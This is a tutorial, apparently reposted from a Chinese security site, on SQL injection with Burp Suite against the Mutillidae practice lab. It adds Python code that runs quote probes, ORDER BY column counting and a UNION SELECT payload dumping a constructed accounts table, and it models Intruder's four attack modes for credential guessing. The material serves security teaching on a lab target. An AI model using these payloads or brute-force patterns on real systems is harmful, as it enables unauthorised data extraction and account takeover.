
使用BurpSuite来进行sql注入


SQL Injection with BurpSuite
[Platform]: mutillidae
[Tools]: BurpSuite 1.4.07 + FireFox
1: Install and configure mutillidae
If you run into problems, see the post below.
http://www.irongeek.com/i.php?page=mutillidae/mutillidae-deliberately-vulnerable-php-owasp-top-10
2: SQL Injection testing
Select "OWASP Top 10" -> "A1 – Injection" -> "SQLi – Extract Data" -> "User Info", as follows:

The following page opens, as shown in the screenshot:

Probe the Name field with a single quote; the response is as follows:

Then inject using the usual techniques:
1.order by
2.UNION
3.SELECT
....
Manual injection is not covered here.
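As an added example (not code from the original post and not Mutillidae's own code), the three probes listed above are carried through in Python against a constructed in-memory SQLite table that stands in for Mutillidae's accounts table. The column names username, password and mysignature, the rows, and the vulnerable query shape (user input concatenated between quotes in WHERE username='...' AND password='...') are assumptions made for the demonstration. Mutillidae itself runs on MySQL; SQLite is used only so the script runs offline, and the probes behave the same way there: ORDER BY past the column count errors, and UNION needs a matching column count.

```python
"""Single-quote probe, ORDER BY column counting and UNION extraction,
modelled against an in-memory SQLite table.

Added example, not code from the post or from Mutillidae. The table,
its columns and rows are constructed; the injectable query shape is the
point being demonstrated, with the parameterised form beside it.
"""
import sqlite3

# Step 3 payload: three columns, matching what the ORDER BY probe finds.
UNION_PAYLOAD = "' UNION SELECT username, password, mysignature FROM accounts -- "


def build_db():
    """Constructed stand-in for Mutillidae's accounts table (assumed layout)."""
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE accounts (username TEXT, password TEXT, mysignature TEXT)"
    )
    con.executemany(
        "INSERT INTO accounts VALUES (?, ?, ?)",
        [
            ("admin", "adminpass", "g0t r00t?"),
            ("user001", "pwd001", "first"),
            ("user002", "pwd002", "second"),
            ("user003", "pwd003", "third"),
        ],
    )
    return con


def vulnerable_lookup(con, username, password):
    """The injectable form: input is pasted straight between the quotes.

    Returns a dict so a SQL error (what the single-quote test looks for)
    can be told apart from a query that ran and returned rows.
    """
    sql = (
        "SELECT username, password, mysignature FROM accounts "
        f"WHERE username='{username}' AND password='{password}'"
    )
    try:
        return {"ok": True, "rows": con.execute(sql).fetchall(), "sql": sql}
    except sqlite3.Error as exc:
        return {"ok": False, "error": str(exc), "sql": sql}


def safe_lookup(con, username, password):
    """Same query with bound parameters: the payloads below stay plain strings."""
    sql = ("SELECT username, password, mysignature FROM accounts "
           "WHERE username=? AND password=?")
    return con.execute(sql, (username, password)).fetchall()


def single_quote_breaks_query(con):
    """Step 1 of the post: a lone ' in the Name field produces a syntax error."""
    return not vulnerable_lookup(con, "'", "x")["ok"]


def count_columns(con, max_cols=16):
    """Step 2: ORDER BY n succeeds while n <= column count, then errors.

    The '-- ' comment (trailing space, as MySQL requires) discards the rest
    of the original WHERE clause, including the password check.
    """
    for n in range(1, max_cols + 1):
        if not vulnerable_lookup(con, f"' ORDER BY {n} -- ", "x")["ok"]:
            return n - 1
    return max_cols


def union_dump(con):
    """Step 3: UNION SELECT with the right column count returns every row."""
    return vulnerable_lookup(con, UNION_PAYLOAD, "x")["rows"]


if __name__ == "__main__":
    db = build_db()
    print("single quote breaks query:", single_quote_breaks_query(db))
    print("columns found by ORDER BY:", count_columns(db))
    for row in union_dump(db):
        print("dumped:", row)
    print("same payload, parameterised:", safe_lookup(db, UNION_PAYLOAD, "x"))
```

The error branch of vulnerable_lookup is what the single-quote check in the post relies on: the application only leaks a database error because the quote unbalances the statement, and the ORDER BY loop turns that same error into a column count, which is the number the UNION payload must match.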
Enough preamble; now straight to how Burp Suite is used.




To use Burp Suite's Intruder well you first have to understand its attack types.
Given the dictionary below, run the test with each of the four attack types in turn:

username ------- password
user001 ------- pwd001
user002 ------- pwd002
user003 ------- pwd003

sniper ------ number of payload sets: 1
----- username/password -------- sniper test process (%username% marks the test variable, i.e. the position that takes the dictionary values)
----- %username%/password
----- username/%password%
user001 ------- password
user002 ------- password
user003 ------- password
....
username ---- user001
username ---- user002
username ---- user003
....

battering ram ----------- number of payload sets: 1
------ username/password ------- battering ram test
------ %username%=%password% ----> %username%/%password%
user001 ------- user001
user002 ------- user002
user003 ------- user003

pitchfork ----------- number of payload sets: 2
----- username/password ------- pitchfork test
user001 -------- pwd001
user002 -------- pwd002
user003 -------- pwd003
...
---------------- ....

cluster bomb ----------- number of payload sets: 2
------- username/password ---------- cluster bomb test
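To make the four expansions above checkable, here is an added example (not from the post and not PortSwigger's code) that models how Intruder turns payload positions and payload sets into requests. The request template and the user001..user003 / pwd001..pwd003 wordlists are constructed to match the dictionary above; sniper and battering ram are driven by the single username list, as in the post's listing, while pitchfork and cluster bomb take one list per position. The cluster bomb case, which the post leaves without output, comes out as 3 x 3 = 9 requests.

```python
"""Reference model of the four Burp Intruder attack types.

Added example, not code from the post or from PortSwigger. It reproduces
how Intruder expands marked payload positions into requests so the request
count and order of each mode can be checked against the listing above.
"""
from itertools import product

# Constructed request template: the two form fields of the Mutillidae
# "User Info" page with the literal values that were in the captured
# request. POSITIONS lists the fields marked as payload positions.
TEMPLATE = {"username": "username", "password": "password"}
POSITIONS = ["username", "password"]

USERNAMES = ["user001", "user002", "user003"]   # payload set 1 (constructed)
PASSWORDS = ["pwd001", "pwd002", "pwd003"]      # payload set 2 (constructed)


def sniper(template, positions, payloads):
    """Sniper: ONE payload set, ONE position at a time.

    Each position is visited in turn and receives every payload while the
    other positions keep their template value. Requests = positions x payloads.
    """
    requests = []
    for pos in positions:
        for payload in payloads:
            req = dict(template)
            req[pos] = payload
            requests.append(req)
    return requests


def battering_ram(template, positions, payloads):
    """Battering ram: ONE payload set, the same payload in EVERY position.

    Useful when one value must appear in several places at once.
    Requests = payloads.
    """
    requests = []
    for payload in payloads:
        req = dict(template)
        for pos in positions:
            req[pos] = payload
        requests.append(req)
    return requests


def pitchfork(template, positions, payload_sets):
    """Pitchfork: one payload set PER position, walked in lockstep.

    The i-th request takes the i-th entry of every set, so the lists must
    be aligned (user001 with pwd001). Burp stops at the shortest set, which
    zip() reproduces. Requests = len(shortest set).
    """
    requests = []
    for combo in zip(*payload_sets):
        req = dict(template)
        req.update(zip(positions, combo))
        requests.append(req)
    return requests


def cluster_bomb(template, positions, payload_sets):
    """Cluster bomb: one payload set per position, EVERY combination.

    Full Cartesian product, so the count multiplies (3 x 3 = 9 here); this is
    the mode that explodes with large wordlists. Requests = product of lengths.
    """
    requests = []
    for combo in product(*payload_sets):
        req = dict(template)
        req.update(zip(positions, combo))
        requests.append(req)
    return requests


def as_pairs(requests):
    """Render requests in the post's 'username/password' notation."""
    return [f"{r['username']}/{r['password']}" for r in requests]


if __name__ == "__main__":
    print("sniper       ", as_pairs(sniper(TEMPLATE, POSITIONS, USERNAMES)))
    print("battering ram", as_pairs(battering_ram(TEMPLATE, POSITIONS, USERNAMES)))
    print("pitchfork    ", as_pairs(pitchfork(TEMPLATE, POSITIONS, [USERNAMES, PASSWORDS])))
    print("cluster bomb ", as_pairs(cluster_bomb(TEMPLATE, POSITIONS, [USERNAMES, PASSWORDS])))
```

The practical consequence is the request budget: for N usernames and M passwords, pitchfork sends min(N, M) requests and only works when the two lists are already paired, while cluster bomb sends N x M and is the mode to reach for when any username may go with any password.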

 
============================================================
If you still want more, www.91ri.org recommends watching the mutillidae video series on YouTube; in my view that series covers Burp Suite usage in real detail. Only part of it is listed here:

mutillidae-finding-comments-and-file-metadata-using-multiple-techniques
mutillidae-demo-usage-of-burp-suite-comparer-tool
mutillidae-brute-force-page-names-using-burp-intruder-sniper
mutillidae-using-burp-intruder-sniper-to-fuzz-parameters
mutillidae-how-to-install-and-configure-burp-suite-with-firefox
mutillidae-basics-of-web-request-and-response-interception-using-burp-suite
mutillidae-three-methods-for-viewing-http-request-and-response-headers
mutillidae-basics-of-burp-suite-targets-tab-and-scope-settings
mutillidae-how-to-bypass-maxlength-restrictions-on-html-input-fields
mutillidae-manual-directory-browsing-to-reveal-mutillidae-easter-egg-file
mutillidae-two-methods-to-bypass-javascript-validation
mutillidae-basics-of-sql-injection-timing-attacks
mutillidae-how-to-exploit-local-file-inclusion-vulnerability-using-burp-suite
mutillidae-analyze-session-token-randomness-using-burp-suite-sequencer
mutillidae-use-burp-suite-sequencer-to-compare-mutillidae-csrf-token-strengths
mutillidae-spidering-web-applications-with-burp-suite
mutillidae-bypass-authentication-using-sql-injection

Reference: http://www.freebuf.com/articles/5560.html

Summary:
This article used Intruder's Sniper attack type as the worked example and explained how the sniper, battering ram, pitchfork and cluster bomb attack types of Burp Suite Intruder work.

Author: Gall. Collected and edited by the information security team of the Network Security Offense and Defense Lab (www.91ri.org); please credit the source when reposting.
